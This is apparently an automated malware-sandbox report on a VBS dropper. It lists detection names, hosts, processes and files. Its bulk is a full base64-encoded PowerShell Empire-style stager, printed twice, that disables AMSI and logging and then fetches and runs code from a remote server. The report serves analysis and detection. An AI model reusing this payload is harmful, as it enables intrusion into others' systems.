AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAAkAGgAdAApAH0AIABjAGEAdABjAGgAIAB7ACQATgB1AGwAbAB9ACQASQB2AD0AJABEAEEAVABhAFsAMAAuAC4AMwBdADsAJABEAEEAdABBAD0AJABkAEEAVABhAFsANAAuAC4AJABkAEEAVABBAC4ATABlAE4AZwB0AGgAXQA7AC0AagBPAEkATgBbAEMASABBAHIAWwBdAF0AKAAmACAAJABSACAAJABkAGEAdABBACAAKAAkAEkAVgArACQARQAyAGIAKQApACAAfAAgAEkARQBYAA== |
host | 117.18.232.200 | |||
host | 89.197.154.116 |
parent_process | wscript.exe | martian_process | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noP -sta -w 1 -enc SQBmACgAJABQAFMAVgBlAFIAUwBJAG8ATgBUAEEAYgBsAGUALgBQAFMAVgBFAHIAcwBpAG8AbgAuAE0AYQBqAG8AcgAgAC0ARwBFACAAMwApAHsAJAAxAEMAZQA9AFsAcgBFAEYAXQAuAEEAcwBzAGUAbQBCAEwAWQAuAEcAZQBUAFQAWQBQAGUAKAAnAFMAeQBzAHQAZQBtAC4ATQBhAG4AYQBnAGUAbQBlAG4AdAAuAEEAdQB0AG8AbQBhAHQAaQBvAG4ALgBVAHQAaQBsAHMAJwApAC4AIgBHAGUAVABGAEkAZQBgAGwARAAiACgAJwBjAGEAYwBoAGUAZABHAHIAbwB1AHAAUABvAGwAaQBjAHkAUwBlAHQAdABpAG4AZwBzACcALAAnAE4AJwArACcAbwBuAFAAdQBiAGwAaQBjACwAUwB0AGEAdABpAGMAJwApADsASQBGACgAJAAxAGMAZQApAHsAJAA5ADgAQwA9ACQAMQBDAEUALgBHAEUAdABWAGEAbABVAGUAKAAkAG4AVQBMAGwAKQA7AEkAZgAoACQAOQA4AEMAWwAnAFMAYwByAGkAcAB0AEIAJwArACcAbABvAGMAawBMAG8AZwBnAGkAbgBnACcAXQApAHsAJAA5ADgAQwBbACcAUwBjAHIAaQBwAHQAQgAnACsAJwBsAG8AYwBrAEwAbwBnAGcAaQBuAGcAJwBdAFsAJwBFAG4AYQBiAGwAZQBTAGMAcgBpAHAAdABCACcAKwAnAGwAbwBjAGsATABvAGcAZwBpAG4AZwAnAF0APQAwADsAJAA5ADgAQwBbACcAUwBjAHIAaQBwAHQAQgAnACsAJwBsAG8AYwBrAEwAbwBnAGcAaQBuAGcAJwBdAFsAJwBFAG4AYQBiAGwAZQBTAGMAcgBpAHAAdABCAGwAbwBjAGsASQBuAHYAbwBjAGEAdABpAG8AbgBMAG8AZwBnAGkAbgBnACcAXQA9ADAAfQAkAHYAQQBsAD0AWwBDAE8ATABsAGUAQwB0AGkATwBOAFMALgBHAEUATgBFAHIAaQBDAC4ARABJAEMAVABpAE8AbgBBAHIAWQBbAFMAVABSAEkAbgBHACwAUwBZAHMAVABFAE0ALgBPAGIAagBlAGMAVABdAF0AOgA6AE4ARQBXACgAKQA7ACQAVgBhAEwALgBBAEQAZAAoACcARQBuAGEAYgBsAGUAUwBjAHIAaQBwAHQAQgAnACsAJwBsAG8AYwBrAEwAbwBnAGcAaQBuAGcAJwAsADAAKQA7ACQAdgBBAEwALgBBAGQAZAAoACcARQBuAGEAYgBsAGUAUwBjAHIAaQBwAHQAQgBsAG8AYwBrAEkAbgB2AG8AYwBhAHQAaQBvAG4ATABvAGcAZwBpAG4AZwAnACwAMAApADsAJAA5ADgAYwBbACcASABLAEUAWQBfAEwATwBDAEEATABfAE0AQQBDAEgASQBOAEUAXABTAG8AZgB0AHcAYQByAGUAXABQAG8AbABpAGMAaQBlAHMAXABNAGkAYwByAG8AcwBvAGYAdABcAFcAaQBuAGQAbwB3AHMAXABQAG8AdwBlAHIAUwBoAGUAbABsAFwAUwBjAHIAaQBwAHQAQgAnACsAJwBsAG8AYwBrAEwAbwBnAGcAaQBuAGcAJwBdAD0AJABWAGEATAB9AEUATABTAEUAewBbAFMAQwByAGkAcAB0AEIAbABvAGMAawBdAC4AIgBHAGUAVABGAGkAZQBgAEwARAAiACgAJwBzAGkAZwBuAGEAdAB1AHIAZQBzACcALAAnAE4AJwArACcAbwBuAFAAdQBiAGwAaQBjACwAUwB0AGEAdABpAGMAJwApAC4AUwBFAFQAVgBhAEwAdQBFACgAJABOAHUATABMACwAKABOAGUAVwAtAE8AYgBqAEUAQwBUACAAQwBPAGwAbABFAEMAVABJAG8AbgBTAC4ARwBlAG4ARQByAEkAQwAuAEgAQQBzAGgAUwBlAFQAWwBzAFQAcgBpAG4AZwBdACkAKQB9ACQAUgBFAEYAPQBbAFIARQBGAF0ALgBBAHMAUwBFAE0AYgBsAHkALgBHAEUAVABUAHkAcABlACgAJwBTAHkAcwB0AGUAbQAuAE0AYQBuAGEAZwBlAG0AZQBuAHQALgBBAHUAdABvAG0AYQB0AGkAbwBuAC4AQQBtAHMAaQAnACsAJwBVAHQAaQBsAHMAJwApADsAJABSAGUAZgAuAEcAZQB0AEYASQBlAGwARAAoACcAYQBtAHMAaQBJAG4AaQB0AEYAJwArACcAYQBpAGwAZQBkACcALAAnAE4AbwBuAFAAdQBiAGwAaQBjACwAUwB0AGEAdABpAGMAJwApAC4AUwBlAHQAVgBBAEwAVQBFACgAJABOAHUAbABMACwAJABUAHIAdQBlACkAOwB9ADsAWwBTAHkAcwBUAEUAbQAuAE4AZQBUAC4AUwBFAHIAVgBpAGMAZQBQAG8ASQBOAFQATQBBAG4AYQBnAEUAcgBdADoAOgBFAFgAUABlAEMAVAAxADAAMABDAG8ATgB0AEkAbgB1AEUAPQAwADsAJABlADIAYgA9AFsAUwB5AHMAdABFAE0ALgBUAEUAeAB0AC4ARQBuAGMAbwBkAGkATgBnAF0AOgA6AEEAUwBDAEkASQAuAEcAZQBUAEIAeQB0AGUAUwAoACcAZAA0ACwAMABnAGsAQABbAFAAKgAhAC8AZgBzAHQAYQA6AGIANwBRAEIAaABsAFUARAByADYAeABFAF0AMwBfACcAKQA7ACQAUgA9AHsAJABEACwAJABlADIAYgA9ACQAQQBSAEcAcwA7ACQAUwA9ADAALgAuADIANQA1ADsAMAAuAC4AMgA1ADUAfAAlAHsAJABKAD0AKAAkAEoAKwAkAFMAWwAkAF8AXQArACQAZQAyAEIAWwAkAF8AJQAkAEUAMgBCAC4AQwBPAFUAbgB0AF0AKQAlADIANQA2ADsAJABTAFsAJABfAF0ALAAkAFMAWwAkAEoAXQA9ACQAUwBbACQASgBdACwAJABTAFsAJABfAF0AfQA7ACQARAB8ACUAewAkAEkAPQAoACQASQArADEAKQAlADIANQA2ADsAJABIAD0AKAAkAEgAKwAkAFMAWwAkAEkAXQApACUAMgA1ADYAOwAkAFMAWwAkAEkAXQAsACQAUwBbACQASABdAD0AJABTAFsAJABIAF0ALAAkAFMAWwAkAEkAXQA7ACQAXwAtAGIAeABvAFIAJABTAFsAKAAkAFMAWwAkAEkAXQArACQAUwBbACQASABdACkAJQAyADUANgBdAH0AfQA7ACQAaQBlAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAC0AQwBPAE0AIABJAG4AdABlAHIAbgBlAHQARQB4AHAAbABvAHIAZQByAC4AQQBwAHAAbABpAGMAYQB0AGkAbwBuADsAJABpAGUALgBTAGkAbABlAG4AdAA9ACQAVAByAHUAZQA7ACQAaQBlAC4AdgBpAHMAaQBiAGwAZQA9ACQARgBhAGwAcwBlADsAJABmAGwAPQAxADQAOwAkAHMAZQByAD0AJAAoAFsAVABlAHgAdAAuAEUATgBDAG8AZABJAG4ARwBdADoAOgBVAG4AaQBjAE8AZABFAC4ARwBlAFQAUwB0AHIAaQBOAEcAKABbAEMAbwBuAFYAZQBSAHQAXQA6ADoARgBSAE8AbQBCAEEAcwBFADYANABTAFQAUgBJAE4ARwAoACcAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQA0AEEARABrAEEATABnAEEAeABBAEQAawBBAE4AdwBBAHUAQQBEAEUAQQBOAFEAQQAwAEEAQwA0AEEATQBRAEEAeABBAEQAWQBBAE8AZwBBADMAQQBEAGcAQQBNAFEAQQB3AEEAQQA9AD0AJwApACkAKQA7ACQAdAA9ACcALwBsAG8AZwBpAG4ALwBwAHIAbwBjAGUAcwBzAC4AcABoAHAAJwA7ACQAYwA9ACIAQwBGAC0AUgBBAFkAOgAgAGIAJwBwAEwAOABjADEAcgBJAFUATQBQAGMAWQBXADAATAAxAFcAYwBRAEwARgBPAE4AcQBDAEgAQQA9ACcAIgA7ACQAaQBlAC4AbgBhAHYAaQBnAGEAdABlADIAKAAkAHMAZQByACsAJAB0ACwAJABmAGwALAAwACwAJABOAHUAbABsACwAJABjACkAOwB3AGgAaQBsAGUAKAAkAGkAZQAuAGIAdQBzAHkAKQB7AFMAdABhAHIAdAAtAFMAbABlAGUAcAAgAC0ATQBpAGwAbABpAHMAZQBjAG8AbgBkAHMAIAAxADAAMAB9ADsAJABoAHQAIAA9ACAAJABpAGUALgBkAG8AYwB1AG0AZQBuAHQALgBHAGUAdABUAHkAcABlACgAKQAuAEkAbgB2AG8AawBlAE0AZQBtAGIAZQByACgAJwBiAG8AZAB5ACcALAAgAFsAUwB5AHMAdABlAG0ALgBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQgBpAG4AZABpAG4AZwBGAGwAYQBnAHMAXQA6ADoARwBlAHQAUAByAG8AcABlAHIAdAB5ACwAIAAkAE4AdQBsAGwALAAgACQAaQBlAC4AZABvAGMAdQBtAGUAbgB0ACwAIAAkAE4AdQBsAGwAKQAuAEkAbgBuAGUAcgBIAHQAbQBsADsAdAByAHkAIAB7ACQAZABhAHQAYQA9AFsAUwB5AHMAdABlAG0ALgBDAG8AbgB2AGUAcgB0AF0AOgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAAkAGgAdAApAH0AIABjAGEAdABjAGgAIAB7ACQATgB1AGwAbAB9ACQASQB2AD0AJABEAEEAVABhAFsAMAAuAC4AMwBdADsAJABEAEEAdABBAD0AJABkAEEAVABhAFsANAAuAC4AJABkAEEAVABBAC4ATABlAE4AZwB0AGgAXQA7AC0AagBPAEkATgBbAEMASABBAHIAWwBdAF0AKAAmACAAJABSACAAJABkAGEAdABBACAAKAAkAEkAVgArACQARQAyAGIAKQApACAAfAAgAEkARQBYAA== | ||||||
parent_process | wscript.exe | martian_process | powershell -noP -sta -w 1 -enc SQBmACgAJABQAFMAVgBlAFIAUwBJAG8ATgBUAEEAYgBsAGUALgBQAFMAVgBFAHIAcwBpAG8AbgAuAE0AYQBqAG8AcgAgAC0ARwBFACAAMwApAHsAJAAxAEMAZQA9AFsAcgBFAEYAXQAuAEEAcwBzAGUAbQBCAEwAWQAuAEcAZQBUAFQAWQBQAGUAKAAnAFMAeQBzAHQAZQBtAC4ATQBhAG4AYQBnAGUAbQBlAG4AdAAuAEEAdQB0AG8AbQBhAHQAaQBvAG4ALgBVAHQAaQBsAHMAJwApAC4AIgBHAGUAVABGAEkAZQBgAGwARAAiACgAJwBjAGEAYwBoAGUAZABHAHIAbwB1AHAAUABvAGwAaQBjAHkAUwBlAHQAdABpAG4AZwBzACcALAAnAE4AJwArACcAbwBuAFAAdQBiAGwAaQBjACwAUwB0AGEAdABpAGMAJwApADsASQBGACgAJAAxAGMAZQApAHsAJAA5ADgAQwA9ACQAMQBDAEUALgBHAEUAdABWAGEAbABVAGUAKAAkAG4AVQBMAGwAKQA7AEkAZgAoACQAOQA4AEMAWwAnAFMAYwByAGkAcAB0AEIAJwArACcAbABvAGMAawBMAG8AZwBnAGkAbgBnACcAXQApAHsAJAA5ADgAQwBbACcAUwBjAHIAaQBwAHQAQgAnACsAJwBsAG8AYwBrAEwAbwBnAGcAaQBuAGcAJwBdAFsAJwBFAG4AYQBiAGwAZQBTAGMAcgBpAHAAdABCACcAKwAnAGwAbwBjAGsATABvAGcAZwBpAG4AZwAnAF0APQAwADsAJAA5ADgAQwBbACcAUwBjAHIAaQBwAHQAQgAnACsAJwBsAG8AYwBrAEwAbwBnAGcAaQBuAGcAJwBdAFsAJwBFAG4AYQBiAGwAZQBTAGMAcgBpAHAAdABCAGwAbwBjAGsASQBuAHYAbwBjAGEAdABpAG8AbgBMAG8AZwBnAGkAbgBnACcAXQA9ADAAfQAkAHYAQQBsAD0AWwBDAE8ATABsAGUAQwB0AGkATwBOAFMALgBHAEUATgBFAHIAaQBDAC4ARABJAEMAVABpAE8AbgBBAHIAWQBbAFMAVABSAEkAbgBHACwAUwBZAHMAVABFAE0ALgBPAGIAagBlAGMAVABdAF0AOgA6AE4ARQBXACgAKQA7ACQAVgBhAEwALgBBAEQAZAAoACcARQBuAGEAYgBsAGUAUwBjAHIAaQBwAHQAQgAnACsAJwBsAG8AYwBrAEwAbwBnAGcAaQBuAGcAJwAsADAAKQA7ACQAdgBBAEwALgBBAGQAZAAoACcARQBuAGEAYgBsAGUAUwBjAHIAaQBwAHQAQgBsAG8AYwBrAEkAbgB2AG8AYwBhAHQAaQBvAG4ATABvAGcAZwBpAG4AZwAnACwAMAApADsAJAA5ADgAYwBbACcASABLAEUAWQBfAEwATwBDAEEATABfAE0AQQBDAEgASQBOAEUAXABTAG8AZgB0AHcAYQByAGUAXABQAG8AbABpAGMAaQBlAHMAXABNAGkAYwByAG8AcwBvAGYAdABcAFcAaQBuAGQAbwB3AHMAXABQAG8AdwBlAHIAUwBoAGUAbABsAFwAUwBjAHIAaQBwAHQAQgAnACsAJwBsAG8AYwBrAEwAbwBnAGcAaQBuAGcAJwBdAD0AJABWAGEATAB9AEUATABTAEUAewBbAFMAQwByAGkAcAB0AEIAbABvAGMAawBdAC4AIgBHAGUAVABGAGkAZQBgAEwARAAiACgAJwBzAGkAZwBuAGEAdAB1AHIAZQBzACcALAAnAE4AJwArACcAbwBuAFAAdQBiAGwAaQBjACwAUwB0AGEAdABpAGMAJwApAC4AUwBFAFQAVgBhAEwAdQBFACgAJABOAHUATABMACwAKABOAGUAVwAtAE8AYgBqAEUAQwBUACAAQwBPAGwAbABFAEMAVABJAG8AbgBTAC4ARwBlAG4ARQByAEkAQwAuAEgAQQBzAGgAUwBlAFQAWwBzAFQAcgBpAG4AZwBdACkAKQB9ACQAUgBFAEYAPQBbAFIARQBGAF0ALgBBAHMAUwBFAE0AYgBsAHkALgBHAEUAVABUAHkAcABlACgAJwBTAHkAcwB0AGUAbQAuAE0AYQBuAGEAZwBlAG0AZQBuAHQALgBBAHUAdABvAG0AYQB0AGkAbwBuAC4AQQBtAHMAaQAnACsAJwBVAHQAaQBsAHMAJwApADsAJABSAGUAZgAuAEcAZQB0AEYASQBlAGwARAAoACcAYQBtAHMAaQBJAG4AaQB0AEYAJwArACcAYQBpAGwAZQBkACcALAAnAE4AbwBuAFAAdQBiAGwAaQBjACwAUwB0AGEAdABpAGMAJwApAC4AUwBlAHQAVgBBAEwAVQBFACgAJABOAHUAbABMACwAJABUAHIAdQBlACkAOwB9ADsAWwBTAHkAcwBUAEUAbQAuAE4AZQBUAC4AUwBFAHIAVgBpAGMAZQBQAG8ASQBOAFQATQBBAG4AYQBnAEUAcgBdADoAOgBFAFgAUABlAEMAVAAxADAAMABDAG8ATgB0AEkAbgB1AEUAPQAwADsAJABlADIAYgA9AFsAUwB5AHMAdABFAE0ALgBUAEUAeAB0AC4ARQBuAGMAbwBkAGkATgBnAF0AOgA6AEEAUwBDAEkASQAuAEcAZQBUAEIAeQB0AGUAUwAoACcAZAA0ACwAMABnAGsAQABbAFAAKgAhAC8AZgBzAHQAYQA6AGIANwBRAEIAaABsAFUARAByADYAeABFAF0AMwBfACcAKQA7ACQAUgA9AHsAJABEACwAJABlADIAYgA9ACQAQQBSAEcAcwA7ACQAUwA9ADAALgAuADIANQA1ADsAMAAuAC4AMgA1ADUAfAAlAHsAJABKAD0AKAAkAEoAKwAkAFMAWwAkAF8AXQArACQAZQAyAEIAWwAkAF8AJQAkAEUAMgBCAC4AQwBPAFUAbgB0AF0AKQAlADIANQA2ADsAJABTAFsAJABfAF0ALAAkAFMAWwAkAEoAXQA9ACQAUwBbACQASgBdACwAJABTAFsAJABfAF0AfQA7ACQARAB8ACUAewAkAEkAPQAoACQASQArADEAKQAlADIANQA2ADsAJABIAD0AKAAkAEgAKwAkAFMAWwAkAEkAXQApACUAMgA1ADYAOwAkAFMAWwAkAEkAXQAsACQAUwBbACQASABdAD0AJABTAFsAJABIAF0ALAAkAFMAWwAkAEkAXQA7ACQAXwAtAGIAeABvAFIAJABTAFsAKAAkAFMAWwAkAEkAXQArACQAUwBbACQASABdACkAJQAyADUANgBdAH0AfQA7ACQAaQBlAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAC0AQwBPAE0AIABJAG4AdABlAHIAbgBlAHQARQB4AHAAbABvAHIAZQByAC4AQQBwAHAAbABpAGMAYQB0AGkAbwBuADsAJABpAGUALgBTAGkAbABlAG4AdAA9ACQAVAByAHUAZQA7ACQAaQBlAC4AdgBpAHMAaQBiAGwAZQA9ACQARgBhAGwAcwBlADsAJABmAGwAPQAxADQAOwAkAHMAZQByAD0AJAAoAFsAVABlAHgAdAAuAEUATgBDAG8AZABJAG4ARwBdADoAOgBVAG4AaQBjAE8AZABFAC4ARwBlAFQAUwB0AHIAaQBOAEcAKABbAEMAbwBuAFYAZQBSAHQAXQA6ADoARgBSAE8AbQBCAEEAcwBFADYANABTAFQAUgBJAE4ARwAoACcAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQA0AEEARABrAEEATABnAEEAeABBAEQAawBBAE4AdwBBAHUAQQBEAEUAQQBOAFEAQQAwAEEAQwA0AEEATQBRAEEAeABBAEQAWQBBAE8AZwBBADMAQQBEAGcAQQBNAFEAQQB3AEEAQQA9AD0AJwApACkAKQA7ACQAdAA9ACcALwBsAG8AZwBpAG4ALwBwAHIAbwBjAGUAcwBzAC4AcABoAHAAJwA7ACQAYwA9ACIAQwBGAC0AUgBBAFkAOgAgAGIAJwBwAEwAOABjADEAcgBJAFUATQBQAGMAWQBXADAATAAxAFcAYwBRAEwARgBPAE4AcQBDAEgAQQA9ACcAIgA7ACQAaQBlAC4AbgBhAHYAaQBnAGEAdABlADIAKAAkAHMAZQByACsAJAB0ACwAJABmAGwALAAwACwAJABOAHUAbABsACwAJABjACkAOwB3AGgAaQBsAGUAKAAkAGkAZQAuAGIAdQBzAHkAKQB7AFMAdABhAHIAdAAtAFMAbABlAGUAcAAgAC0ATQBpAGwAbABpAHMAZQBjAG8AbgBkAHMAIAAxADAAMAB9ADsAJABoAHQAIAA9ACAAJABpAGUALgBkAG8AYwB1AG0AZQBuAHQALgBHAGUAdABUAHkAcABlACgAKQAuAEkAbgB2AG8AawBlAE0AZQBtAGIAZQByACgAJwBiAG8AZAB5ACcALAAgAFsAUwB5AHMAdABlAG0ALgBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQgBpAG4AZABpAG4AZwBGAGwAYQBnAHMAXQA6ADoARwBlAHQAUAByAG8AcABlAHIAdAB5ACwAIAAkAE4AdQBsAGwALAAgACQAaQBlAC4AZABvAGMAdQBtAGUAbgB0ACwAIAAkAE4AdQBsAGwAKQAuAEkAbgBuAGUAcgBIAHQAbQBsADsAdAByAHkAIAB7ACQAZABhAHQAYQA9AFsAUwB5AHMAdABlAG0ALgBDAG8AbgB2AGUAcgB0AF0AOgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAAkAGgAdAApAH0AIABjAGEAdABjAGgAIAB7ACQATgB1AGwAbAB9ACQASQB2AD0AJABEAEEAVABhAFsAMAAuAC4AMwBdADsAJABEAEEAdABBAD0AJABkAEEAVABhAFsANAAuAC4AJABkAEEAVABBAC4ATABlAE4AZwB0AGgAXQA7AC0AagBPAEkATgBbAEMASABBAHIAWwBdAF0AKAAmACAAJABSACAAJABkAGEAdABBACAAKAAkAEkAVgArACQARQAyAGIAKQApACAAfAAgAEkARQBYAA== |
option | -nop | value | Does not load current user profile | ||||||
option | -nop | value | Does not load current user profile |
Cynet | Malicious (score: 99) |
CAT-QuickHeal | Script.Trojan.39876 |
Skyhigh | PS/Dropper.f |
ALYac | GT:VB.ObfDldr.28.29C080A2 |
VIPRE | GT:VB.ObfDldr.28.29C080A2 |
Sangfor | Malware.Generic-VBS.Save.f99adb70 |
Arcabit | GT:VB.ObfDldr.28.29C080A2 |
Symantec | Trojan.Malscript!gen8 |
ESET-NOD32 | PowerShell/TrojanDownloader.Agent.ABM |
McAfee | PS/Dropper.f |
Avast | VBS:Downloader-AXD [Trj] |
Kaspersky | HEUR:Trojan.PowerShell.Generic |
BitDefender | GT:VB.ObfDldr.28.29C080A2 |
NANO-Antivirus | Trojan.Script.Downloader.inbiqr |
MicroWorld-eScan | GT:VB.ObfDldr.28.29C080A2 |
Emsisoft | GT:VB.ObfDldr.28.29C080A2 (B) |
F-Secure | Malware.VBS/PSRunner.VPSV |
FireEye | GT:VB.ObfDldr.28.29C080A2 |
Sophos | ATK/Empire-U |
Detected | |
Avira | VBS/PSRunner.VPSV |
Xcitium | TrojWare.Win32.BadShell.XSN@7pmib7 |
Microsoft | Trojan:PowerShell/Fleisnam.E |
ZoneAlarm | HEUR:Trojan.PowerShell.Generic |
GData | GT:VB.ObfDldr.28.29C080A2 |
AhnLab-V3 | Powershell/Downloader.S5 |
Tencent | Heur:Trojan.Powershell.Generic.u |
MAX | malware (ai score=88) |
Fortinet | PowerShell/Agent.AN!tr |
AVG | VBS:Downloader-AXD [Trj] |
file | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
file | C:\Windows\System32\ie4uinit.exe |
file | C:\Program Files\Windows Sidebar\sidebar.exe |
file | C:\Windows\System32\WindowsAnytimeUpgradeUI.exe |
file | C:\Windows\System32\xpsrchvw.exe |
file | C:\Windows\System32\displayswitch.exe |
file | C:\Program Files\Common Files\Microsoft Shared\ink\mip.exe |
file | C:\Windows\System32\mblctr.exe |
file | C:\Windows\System32\mstsc.exe |
file | C:\Windows\System32\SnippingTool.exe |
file | C:\Windows\System32\SoundRecorder.exe |
file | C:\Windows\System32\dfrgui.exe |
file | C:\Windows\System32\msinfo32.exe |
file | C:\Windows\System32\rstrui.exe |
file | C:\Program Files\Common Files\Microsoft Shared\ink\ShapeCollector.exe |
file | C:\Program Files\Windows Journal\Journal.exe |
file | C:\Windows\System32\MdSched.exe |
file | C:\Windows\System32\msconfig.exe |
file | C:\Windows\System32\recdisc.exe |
file | C:\Windows\System32\msra.exe |
dead_host | 192.168.56.102:49164 |
dead_host | 192.168.56.102:49165 |
dead_host | 192.168.56.102:49163 |
dead_host | 89.197.154.116:7810 |